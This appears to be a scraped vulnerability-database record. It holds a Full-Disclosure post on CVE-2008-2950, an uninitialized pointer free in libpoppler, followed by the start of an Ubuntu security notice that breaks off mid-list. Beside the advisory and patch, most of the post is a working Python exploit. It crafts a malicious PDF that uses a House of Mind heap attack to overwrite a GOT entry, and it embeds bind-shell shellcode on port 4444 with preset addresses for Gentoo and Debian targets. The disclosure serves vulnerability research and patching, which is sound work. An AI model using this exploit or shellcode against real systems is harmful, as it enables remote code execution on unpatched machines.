friend once told me that if in doubt take your pants off. I've already\r\ntried that and I didn't earn no resolution to my conflict so.. I thought I\r\nshould try the internet version of that strategy. So here we are, enjoy...\r\nf/\r\n\r\n'''\r\n#OCERT ADV\r\n#2008-007 libpoppler uninitialized pointer\r\n\r\nDescription:\r\n\r\nThe poppler PDF rendering library suffers a memory management bug which\r\nleads to arbitrary code execution.\r\n\r\nThe vulnerability is present in the Page class constructor/destructor. The\r\npageWidgets object is not initialized in the Page constructor if specific\r\nconditions are met, but it is deleted afterwards in the destructor\r\nregardless of its initialization.\r\n\r\nSpecific PDF files can be crafted which allocate arbitrary memory to\r\ntrigger the vulnerability.\r\n\r\nA new poppler version addressing the issue is scheduled to be released on\r\nJuly 30th according to maintainer.\r\n\r\nThe following patch fixes the issue:\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key,\r\nPDFRectangle *box) {\r\n\r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n-\r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\nAffected version:\r\n\r\nPoppler <= 0.8.4\r\n\r\nFixed version:\r\n\r\nPoppler, N/A\r\n\r\nCredit: vulnerability report, patch and PoC code received from Felipe\r\nAndres Manzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>.\r\n\r\nCVE: CVE-2008-2950\r\nTimeline:\r\n\r\n2008-06-27: vulnerability report received\r\n2008-06-28: contacted poppler maintainers and affected vendors\r\n2008-06-30: maintainer confirms issue and patch\r\n2008-07-07: advisory release\r\n\r\nReferences:\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2008-007.html\r\n\r\n\r\n####END OCERT\r\n\r\n\r\nSumary:\r\n=======\r\n\r\nThe libpoppler pdf rendering library, can free uninitialized pointers,\r\nleading to arbitrary code execution. This vulnerability results from\r\nmemory management bugs in the Page class constructor/destructor.\r\n\r\n\r\nTechnical Description - Exploit/Concept Code:\r\n=============================================\r\n\r\nTests were performed using libpoppler util pdftotext taken from\r\ngit://git.freedesktop.org/git/poppler/poppler.\r\nOther version where tried succesfully (the ones shiped with\r\ndebian/gentoo).\r\n\r\nIn the initialization of a Page object and under certain conditions a\r\nmember object skips initialization, but then is eventualy deleted. This\r\ncan be conducted to the situation in which an arbitrary pointer is\r\npassed to the libc free and so the it gets apropiate for the malloc\r\nmaleficarum to enter the scene.\r\n\r\nLook at the Page class constructor on Page.cc:231. First at the begining\r\nof the function the member object pageWidgets isnt initialized then it\r\ntries to check if the type of the annotations proposed on the pdf file\r\nar correct; if not it bails out to the label err2. Note that is some\r\nincorcondance on the type of the anotation arise the member variable\r\npageWidgets is never initialized!\r\n\r\nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n[...]\r\n // annotations\r\n pageDict->lookupNF("Annots", &annots);\r\n if (!(annots.isRef() || annots.isArray() || annots.isNull())) {\r\n error(-1, "Page annotations object (page %d) is wrong type (%s)",\r\n num, annots.getTypeName());\r\n annots.free();\r\n goto err2;\r\n }\r\n\r\n // forms\r\n pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);\r\n tmp.free();\r\n[...]\r\n err2:\r\n annots.initNull();\r\n err1:\r\n contents.initNull();\r\n ok = gFalse;\r\n}\r\n\r\nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted\r\nwithout any consideration. The Page destructor is inmediatelly called\r\nafter the erroneous Page construction.\r\n\r\nPage::~Page() {\r\n delete pageWidgets;\r\n delete attrs;\r\n annots.free();\r\n contents.free();\r\n}\r\n\r\n\r\nIt is worth mentioning that the pdf rendering scenario is friendly with\r\nthe heap massage technics because you will find lots of ways to allocate\r\nor allocate/free memory in the already probided functionality. In the\r\nPOC I have used repetidely the 'name' of the fields of a pdf dictionary\r\nto allocate memory. Each name allocates up to 127bytes and apparently\r\nthere is no limit in the number of fields.\r\n\r\n\r\nThe following excerpt is a sample verification of the existence of\r\nthe problem :\r\n\r\nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext\r\n>test.pdf\r\nlocalhost expl-poppler # pdftotext test.pdf\r\nError: PDF file is damaged - attempting to reconstruct xref table...\r\nError: Annotation rectangle is wrong type\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Page annotations object (page 3) is wrong type (integer)\r\nError: Page count in top-level pages object is incorrect\r\nError: Couldnt read page catalog\r\nTrace/breakpoint trap\r\n\r\n:)\r\n\r\n\r\nFurther research should be done to accomodate the heap for other\r\napplications like evince:\r\nlocalhost expl-poppler # evince test.pdf\r\n\r\n(evince:8912): GnomeUI-WARNING **: While connecting to session manager:\r\nAuthentication Rejected, reason : None of the authentication protocols\r\nspecified are supported and host-based authentication failed.\r\n\r\n** (evince:8912): WARNING **: Service registration failed.\r\n\r\n** (evince:8912): WARNING **: Did not receive a reply. Possible causes\r\ninclude: the remote application did not send a reply, the message bus\r\nsecurity policy blocked the reply, the reply timeout expired, or the\r\nnetwork connection was broken.\r\nError: PDF file is damaged - attempting to reconstruct xref table...\r\nError: Annotation rectangle is wrong type\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Bad bounding box for annotation\r\nError: Page annotations object (page 3) is wrong type (integer)\r\n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468\r\n***\r\n\r\nNote that 0x08100468 is still a provided pointer. But in this try some\r\nmalloc structure like _heap_info (see. house of mind) is not correctly\r\naligned any more. Maybe evince-thumbnailer which is (probably\r\nmonothreaded) is an easier target.\r\n\r\n\r\nPatch\r\n=====\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key,\r\nPDFRectangle *box) {\r\n\r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form\r\n*form) {\r\n Object tmp;\r\n-\r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\n\r\nPOC:\r\n===\r\n\r\nWritten in pyploit. It can be used 2 ways , one selecting a preconfigured\r\ntarget like *gentoo-pdftotext* or the other in which you could pass some\r\nmalloc/free execution trace moddifing parameters.\r\n\r\n'''\r\n##########################################################################\r\n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ####\r\n#### some shit on http://felipe.andres.manzano.googlepages.com/home ####\r\n##########################################################################\r\n\r\nimport struct\r\nimport struct\r\nimport math\r\nimport os\r\n\r\nimport sys\r\n\r\n## print "%.400f"%d wont work :( ... so a quick double printing class\r\nclass Doubles:\r\n def __init__(self, precision=400):\r\n self.precision=precision\r\n\r\n def pdficateint(self,i1,i2):\r\n s = struct.pack("@L",i1) + struct.pack("@L",i2)\r\n return self.pdficatestr(s)\r\n\r\n def pdficate(self,s):\r\n rslt = " "\r\n for pos in range (0,len(s)/8):\r\n rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" "\r\n return rslt;\r\n\r\n def pdficatestr(self, s):\r\n d = struct.unpack("d",s)[0]\r\n rslt=" "\r\n if(d<0.0):\r\n rslt+="-"\r\n d=-d\r\n rslt+="%d."%int(math.floor(d))\r\n myd=math.floor(d)\r\n scale=0.1\r\n nines=0\r\n for p in range(1,self.precision):\r\n for i in range(1,10):\r\n if (myd+scale*i) > d:\r\n i-=1\r\n break\r\n if i==9:\r\n if nines>6:\r\n return rslt\r\n else:\r\n nines+=1\r\n else:\r\n nines=0\r\n rslt+=("%02d"%i)[1]\r\n myd+=scale* i\r\n scale=scale*0.1\r\n return rslt\r\n\r\n##From Malloc maleficarum\r\n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt\r\nclass HouseOfMind:\r\n\r\n HEAP_MAX_SIZE=(1024*1024)\r\n JMP='\xeb'\r\n NOP='\x90'\r\n PAD='\x00'\r\n PREV_INUSE=0x1\r\n IS_MMAPPED=0x2\r\n NON_MAIN_ARENA=0x4\r\n def __init__(self, base, where, payload, entrypoint):\r\n self.base=base\r\n self.where=where-0xc\r\n self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1)\r\n self.payload=payload\r\n self.entrypoint=entrypoint\r\n self.chunkaddress=0\r\n if (self.entrypoint > 0xff - 8):\r\n throw\r\n\r\n## lendian, 32bit only\r\n## See The Malloc Maleficarum / House of Mind\r\n def mind(self):\r\n rslt = ""\r\n #first we add padding to reach the next Heap border\r\n rslt+=self.PAD*(self.heap_info-self.base)\r\n\r\n #now we add a _heap_info pinting to a malloc_state of our own\r\n #and dictating a generous size for this *heap*\r\n ##arena.c:59 //struct _heap_info\r\n rslt += struct.pack("<L", self.heap_info + 16) # Arena for this heap.\r\n rslt += struct.pack("<L", 0x0000000) # Previous heap. (BUG: Don't\r\nknow what M does with this)\r\n rslt += struct.pack("<L", 0x7000000) # Current size in bytes.\r\n rslt += struct.pack("<L", 0x7000000) # Size in bytes that has been\r\nmprotected PROT_READ|PROT_WRITE\r\n #here arena.c suggest some padding. We just don't do it.\r\n\r\n\r\n #now we add the malloc_state of our own\r\n ##malloc.c:2317 //struct malloc_state\r\n rslt += struct.pack("<L", 0x00000000) # mutex for\r\nserializing access * 0 -> unlocked.\r\n rslt += struct.pack("<L", 0x000ffff) # Flags * We need\r\nNONCONTIGUOUS_BIT to be on for passing\r\n # condition on malloc.c:@@@@@\r\n\r\n #Note: We assume not Thread's stats#\r\n\r\n rslt += struct.pack("<L", 0x00000000)*10 #Fastbins * We\r\ndon use them.\r\n rslt += struct.pack("<L", 0x00000000) #Base of the\r\ntopmost chunk--not otherwise kept in a bin\r\n #We need it to be\r\ndifferent to our\r\nchunk pointer for\r\n #passing condition\r\non malloc.c:@@@@,\r\n0 is safe enough\r\n rslt += struct.pack("<L", 0x00000000) #The remainder from\r\nthe most recent split of a small request\r\n\r\n #Here it come the bins\r\n ##The first one is the Unsorted bin!\r\n ##Free will write the *chunk* to the containing address +0xc; so it\r\n ##shout point to the GOT pointer to 'overload' -0xc\r\n rslt += struct.pack("<L", self.where);\r\n\r\n rslt += struct.pack("<L", 0x0000000)* 253 #All the other\r\nunused bins go to 0 * ~\r\n rslt += struct.pack("<L", 0x00000000)*4 #Bitmap of\r\nbins\r\n\r\n rslt += struct.pack("<L", 0x00000000) #Linked list next\r\nmalloc_state\r\n\r\n ##Memory allocated from the system in this arena.\r\n rslt += struct.pack("<L", 0x70000000) #system_mem * Need to\r\nbe big enough for passing the\r\n #condition on malloc:@@@@\r\n rslt += struct.pack("<L", 0x00000000) #max_system_mem ??\r\n\r\n #needed for chunk aligment\r\n rslt += self.PAD*4\r\n\r\n#CHUNKS\r\n# An allocated chunk looks like this:\r\n#\r\n# chunk->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of previous chunk, if allocated \r\n| |\r\n# \r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of chunk, in bytes \r\n|M|P|\r\n# mem->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | User data starts here... \r\n .\r\n# . \r\n .\r\n# . (malloc_usable_size() bytes) \r\n .\r\n# . \r\n |\r\n#nextchunk->\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n# | Size of chunk \r\n |\r\n# \r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n\r\n\r\n #chunk 0 There isn't a single reason for this to exist *\r\nwabaaaaaaaaaa!\r\n# rslt += struct.pack("<L", 16) #Size of previous chunk *\r\nUNUSED\r\n# rslt += struct.pack("<L", 64) #Size of chunk, in bytes.\r\nNo flags\r\n# rslt += self.PAD*(64-8)\r\n\r\n #chunk 1 THE CHAMP\r\n rslt +=\r\n"\x40"+self.JMP+struct.pack("B",5+self.entrypoint)+self.PAD \r\n#Size of previous chunk *DOESN'T MATTER!\r\n rslt +=\r\nstruct.pack("<L",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA)\r\n# Size of this chunk\r\n #TODO:\r\nExplain\r\nflags,\r\nlink\r\ncode\r\n\r\n ##Save the chunk1 address\r\n self.chunkaddress= self.base + len(rslt)\r\n rslt += self.payload #payload (payload[entrypoint] should\r\ncontain shellcode)!\r\n\r\n #chunk 2 THE LAST?\r\n rslt += struct.pack("<L",8+len(self.payload)) #Size of\r\nprevious chunk\r\n #TODO: link where\r\nit is checked\r\n\r\n rslt += struct.pack("<L",64|self.PREV_INUSE|self.NON_MAIN_ARENA) \r\n#Size of this chunk\r\n #Neds\r\nto\r\nbe\r\ngreater\r\nthan\r\n2\r\n*\r\nSIZE_SZ,\r\n #TODO:\r\nExplain\r\nflags,\r\nlink\r\ncode\r\n\r\n rslt += self.PAD*(64-8)\r\n\r\n #chunk 3 THE LAST!\r\n rslt += struct.pack("<L",64) #Size of previous chunk\r\n rslt += struct.pack("<L",self.PREV_INUSE) #Size of this chunk *\r\nHere we need just the PREV_INUSE bit set\r\n return rslt\r\n #no need no payload\r\n\r\n#For constructing a minimal pdf file\r\nclass PDFObject:\r\n def __init__(self,toks):\r\n self.toks=toks\r\n self.n=0\r\n self.v=0\r\n\r\n def __str__(self):\r\n s="%d %d obj\n"%(self.n,self.v)\r\n for t in self.toks:\r\n s+=t.__str__()\r\n s+="\nendobj\n"\r\n return s\r\n\r\n\r\nclass PDFDict():\r\n def __init__(self):\r\n self.dict = []\r\n\r\n def add(self,name,obj):\r\n self.dict.append((name,obj))\r\n\r\n def __str__(self):\r\n s="<<"\r\n for name,obj in self.dict:\r\n s+="/%s %s\n"%(name,obj)\r\n s+=">>"\r\n return s\r\n\r\nclass PDFName():\r\n def __init__(self,s):\r\n self.s=s\r\n def __str__(self):\r\n return "/%s"%self.s\r\n\r\nclass PDFString():\r\n def __init__(self,s):\r\n self.s=s\r\n def __str__(self):\r\n return "(%s)"%self.s\r\n\r\nclass PDFRef():\r\n def __init__(self,obj):\r\n self.obj=obj\r\n def __str__(self):\r\n return "%d %d R"%(self.obj.n,self.obj.v)\r\n\r\n\r\nclass PDFDoc():\r\n def __init__(self):\r\n self.objs=[]\r\n\r\n def add(self,obj):\r\n obj.v=0\r\n obj.n=1+len(self.objs)\r\n self.objs.append(obj)\r\n\r\n def _header(self):\r\n return "%PDF-1.5\n"\r\n\r\n def __str__(self):\r\n doc1 = "%PDF-1.5\n"\r\n xref = {}\r\n for obj in self.objs:\r\n xref[obj.n] = len(doc1)\r\n doc1=doc1+obj.__str__()\r\n posxref=len(doc1)\r\n doc1+="xref\n"\r\n doc1+="0 %d\n"%len(self.objs)\r\n doc1+="0000000000 65535 f\n"\r\n for xr in xref.keys():\r\n doc1+= "%010d %05d n\n"%(xref[xr],0)\r\n doc1+="trailer\n"\r\n trailer = PDFDict()\r\n trailer.add("Size",len(self.objs))\r\n trailer.add("Root","2 0 R")\r\n doc1+=trailer.__str__()\r\n doc1+="\nstartxref\n%d\n"%posxref\r\n doc1+="%%EOF\n\n"\r\n\r\n return doc1\r\n\r\n#The ... "POC"\r\nclass PopplerExpl:\r\n\r\n def __init__(self,shellcode):\r\n self.shellcode=shellcode\r\n self.d = Doubles()\r\n\r\n#this wraps the shellcode in an encoding supported by 'doubles'\r\n def wrap(self,scode,where):\r\n wrapscode = '\xb8' + struct.pack("<L",where)+"\x90"*3 \r\n#movl where, %eax;nop;nop;nop\r\n for c in scode:\r\n wrapscode += "\xc6\x00%c\x40"%c \r\n#movb $c, (%eax); inc %eax\r\n if (len(scode)%2!=0):\r\n wrapscode += "\xc6\x00\xcc\x40" \r\n#movb $0xcc, (%eax); inc %eax\r\n wrapscode += "\xb8" + struct.pack("<L",where)+"\x90"*3 \r\n#movl where, %eax;nop;nop;nop\r\n wrapscode += "\x50\xc3" \r\n#push %eax;ret\r\n return wrapscode + '\x00'*(1000-len(wrapscode)) \r\n#padding to a supported size\r\n\r\n def make(self,base,got,massage=None):\r\n #here we generate the house of mind thingy\r\n #The House Of Mind instance.\r\n #Te first word es passed tu a gfree so we put 0 so we ignore that\r\nfree.\r\n hm = HouseOfMind(base, got, "\x00"*16+\r\nself.wrap(self.shellcode,base), 16)\r\n mind = hm.mind()\r\n\r\n doc = PDFDoc()\r\n doc.add(PDFObject(["<</Length 3>>\nstream...\nendstream\n"]))\r\n catalog = PDFDict()\r\n catalog.add("Type", PDFName("Catalog"))\r\n catalog.add("Outlines", "3 0 R")\r\n catalog.add("Pages", "4 0 R")\r\n catalog.add("AcroForm", "<</Fields [ 7 0 R ]>>")\r\n\r\n #for i in range(0,1000):\r\n # catalog.add( "C"*82 + "%05d"%i, 0)\r\n\r\n outlines = PDFDict()\r\n outlines.add("Type", PDFName("Outlines"))\r\n outlines.add("Count",0)\r\n\r\n pages = PDFDict()\r\n pages.add("Type", PDFName("Pages"))\r\n pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]")\r\n pages.add("Count","3")\r\n\r\n doc.add(PDFObject([catalog]))\r\n doc.add(PDFObject([outlines]))\r\n doc.add(PDFObject([pages]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 ]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "0")\r\n\r\n #malloc-fill-free lots of chunks of the size then used by Page\r\nclass(88)\r\n for pagesize in range(88,126):\r\n payload =\r\n("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i])\r\nfor i in range (0,4)]))*19\r\n payload += "B"*(pagesize-(len(payload)/3))\r\n for i in range(0,10):\r\n page1.add(payload, 0)\r\n\r\n doc.add(PDFObject([page1]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 ]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]")\r\n\r\n #massage session 1\r\n size=127\r\n for i in range(0,massage[0]):\r\n page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size)\r\n\r\n doc.add(PDFObject([page1]))\r\n annots = PDFDict()\r\n annots.add("Subtype","/Text")\r\n\r\n annots.add("BS", "<</D [ "+\r\n "0 "*massage[1] +\r\n self.d.pdficate(mind)+\r\n #more massage>?\r\n "0.0 "*massage[2] + " ]>>")\r\n\r\n annots.add("FT", "/Tx")\r\n doc.add(PDFObject([annots]))\r\n\r\n page1 = PDFDict()\r\n page1.add("Type", PDFName("Page"))\r\n page1.add("Parent", "4 0 R")\r\n page1.add("MediaBox","[ 0 0 612 792 ]")\r\n page1.add("Contents", "1 0 R")\r\n page1.add("Resources", "<< /ProcSet 6 0 R >>")\r\n page1.add("Annots", "[7 0 R]")\r\n doc.add(PDFObject([page1]))\r\n doc.add(PDFObject(["<<>>"]))\r\n doc.add(PDFObject(["[ /PDF ]"]))\r\n return doc.__str__()\r\n\r\n\r\n##Main\r\n## Not every shellcode will work by now\r\n## Only the ones that taken by 8bytes form an ieee754 double presicion float\r\n## with an exponent not too positive ... :)\r\n\r\n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com\r\nscode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"\r\nscode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"\r\nscode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"\r\nscode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"\r\nscode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"\r\nscode += "\x89\xe1\xcd\x80"\r\n\r\n#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2))\r\nexpl = PopplerExpl(scode)\r\n\r\ntargets = {\r\n "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400),\r\n "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400),\r\n "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200),\r\n\r\n}\r\n\r\nif len( sys.argv )==1:\r\n print "Comments -> fmanzano@fceia.unr.edu.ar"\r\n print "Usage 1:"\r\n print " %s "%sys.argv[0], targets.keys()\r\n print "Usage 2:"\r\n print " %s massage1 massage2 massage3 base got"%sys.argv[0]\r\n print " The idea here is to align the _heap_info struct that\r\ncommences with 0x08?00010 "\r\n print " to the address 0x8?0000. For this pourpose move\r\nmassage1/2/3. "\r\n print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW\r\nAPPS !"\r\n print " base is the 1024*1024 bytes aligned address to which we\r\nare trying to align everything"\r\n print " got is the addres of the got where the thing is going\r\nto write the shellcode address"\r\n print " BTW by now the shellcode is nop;int 3;nop...grooovy!..\r\nNOT"\r\nelif len( sys.argv )>2:\r\n print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16),\r\n(int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3])))\r\nelse:\r\n #base: the expected heap limit (08100000,08200000,....08f00000... )\r\n #got: address of the got entry to change\r\n #chinesse massage\r\n base,got,massage1,massage2,massage3 = targets[sys.argv[1]]\r\n print expl.make(base,got,(massage1,massage2,massage3))\r\n\r\n\r\n#thnks A\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2008-07-10T00:00:00", "published": "2008-07-10T00:00:00", "id": "SECURITYVULNS:DOC:20142", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20142", "title": "[Full-disclosure] #2008-007 libpoppler uninitialized pointer - POC", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "description": "=========================================================== \r\nUbuntu Security Notice USN-631-1 July 28, 2008\r\npoppler vulnerability\r\nCVE-2008-2950\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 7.10\r\nUbuntu 8.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 7.10:\r\n libpoppler2 0.6-0ubuntu2.3\r\n\r\nUbuntu 8.04 LTS:\r\n libpoppler2 0.6.4-1ubuntu3.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nFelipe Andres Manzano discovered that poppler did not correctly\r\ninitialize\r\ncertain page widgets. If a user were tricked into viewing a malicious\r\nPDF file, a remote attacker could exploit this to crash applications\r\nlinked against poppler, leading to a denial of service.\r\n\r\n\r\nUpdated packages for Ubuntu 7.10:\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6-0ubuntu2.3.diff.gz\r\n Size/MD5: 14304 60e84880ed135ad6962b99a2f70ece45\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6-0ubuntu2.3.dsc\r\n Size/MD5: 1217 b0b10708006d1ebafb6429e241d226e5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.orig.tar.gz\r\n Size/MD5: 1228142 96883867572aa1e55e979ec75369c562\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 944416 63ce3efe8420ef87d875d0640f7f289e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 157220 9edd733b20ab242a619922ead7c7847a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 102236 d5f03ef70234c6cbfbf8a0dd7c95cf50\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 80938 2acc7fb66de4c697290ce9a8ab4b8307\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 73164 7dc11aed282cac586e446a955b4dc335\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 193558 ad541b22e629219c09de6869d39ad8c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 232848 25241267bb5ef700d444a11c05b9c961\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 690898 d595084121dbe420ef93d4744e3ac4f5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_amd64.deb\r\n Size/MD5: 126224 951f2bc9b3c53c128b9121a3c6c3d66c\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 887734 5eb25b39ea0c22eccd5ab4af89e4e4ed\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 150898 e77a0a19506f8fd6e7e5fc920b5b78a4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 100076 8f1d1a787234b7d644f1a1105c7e20ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 77258 7f81da7f6ae2e9fd2ac40f719d4d27e6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 72698 5ef2389b711be2cecbcf853b0b691a2e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 192304 aa5fec08b8f21a9e676ef7a1132b59ac\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 222712 b33bd5d0336c93706424f164da057c4f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 668580 6ec4d78fd49e0adf8e068be8992b131b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_i386.deb\r\n Size/MD5: 120860 591a667e48a7ca99ed49ee01ddf86263\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 904110 56b8a084f5da0ce5b483deb9145e43c8\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 151646 34078b6f1c7dd03b09a9d49c5c781ca9\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 100312 46c34f9b71c0d04b03326f73015db564\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 77740 08b6929b3048c39df47a9502bafc31d7\r\n 